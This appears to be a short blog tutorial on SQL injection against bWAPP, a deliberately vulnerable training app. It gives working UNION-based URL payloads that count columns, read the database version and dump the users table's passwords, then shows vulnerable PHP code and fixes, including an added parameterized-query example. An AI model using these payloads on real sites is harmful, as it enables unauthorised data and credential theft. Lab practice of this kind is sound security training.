SQL Injection

SQL Injection – Low

How does it work?

 https://www.w3schools.com/sql/sql_injection.asp

Some Commands

Test whether the server is vulnerable

http://192.168.20.131/bWAPP/sqli_1.php?title='&action=search

Check how many valid columns there are

http://192.168.20.131/bWAPP/sqli_1.php?title=1'order by 1,2,3,4,5,6,7-- -&action=search

Check the version of the MySQL database

http://192.168.20.131/bWAPP/sqli_1.php?title=1'union+select+1,@@version,3,4,5,6,7--+-&action=search

Retrieve the passwords from the users table

http://192.168.20.131/bWAPP/sqli_1.php?title=1'union+select+1,(SELECT+GROUP_CONCAT(password+SEPARATOR+0x3c62723e)+FROM+users),3,4,5,6,7--+-&action=search

A Useful Tool

A useful tool for website hacking is HackBar.

It only works in Firefox.

https://addons.mozilla.org/en-US/firefox/addon/hackbar1/


Vulnerable Code

$var = $_POST['var'];
mysql_query("SELECT * FROM sometable WHERE id = $var");

How to deal with it.

$var = mysql_real_escape_string($_POST['var']);

Do not build queries by concatenating strings; it is very bad practice.

PHP comes with many built-in functions, such as addslashes, mysql_escape_string and mysql_real_escape_string.

Some of these functions have flaws and will be obsolete.
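The vulnerable pattern above next to a parameterized version, as an added example that is not code from the original post. It matters here because the page's query uses the value unquoted (`id = $var`), so an input with no quote characters passes through a quote-escaping function unchanged, and because the `mysql_*` extension was removed in PHP 7.0. Assumptions: PDO with an in-memory SQLite database stands in for MySQL, the table contents are constructed, and the function names are hypothetical.

```php
<?php
// Added example: constructed table and data in an in-memory SQLite database.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE sometable (id INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO sometable (id, name) VALUES (1, 'alpha'), (2, 'beta'), (3, 'gamma')");

// Vulnerable pattern from the page: the value is pasted into the SQL text,
// so the database parses it as part of the statement.
function find_concatenated(PDO $pdo, string $var): array
{
    return $pdo->query("SELECT * FROM sometable WHERE id = $var")
               ->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: validate the type first, then bind the value as a parameter.
// The SQL text is fixed; the input can only ever be compared as data.
function find_prepared(PDO $pdo, string $var): array
{
    $id = filter_var($var, FILTER_VALIDATE_INT);
    if ($id === false) {
        return [];                      // reject anything that is not an integer
    }
    $stmt = $pdo->prepare('SELECT * FROM sometable WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: one ordinary id and one that carries SQL syntax.
foreach (['2', '2 OR 1=1'] as $input) {
    printf("%-10s concatenated=%d row(s)  prepared=%d row(s)\n",
        "'$input'",
        count(find_concatenated($pdo, $input)),
        count(find_prepared($pdo, $input)));
}
```

The row counts differ only for the second input: the concatenated query returns every row in the table, while the prepared version rejects the value before it reaches the database.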

Demonstration Of The Attack

If you have any questions please comment below.
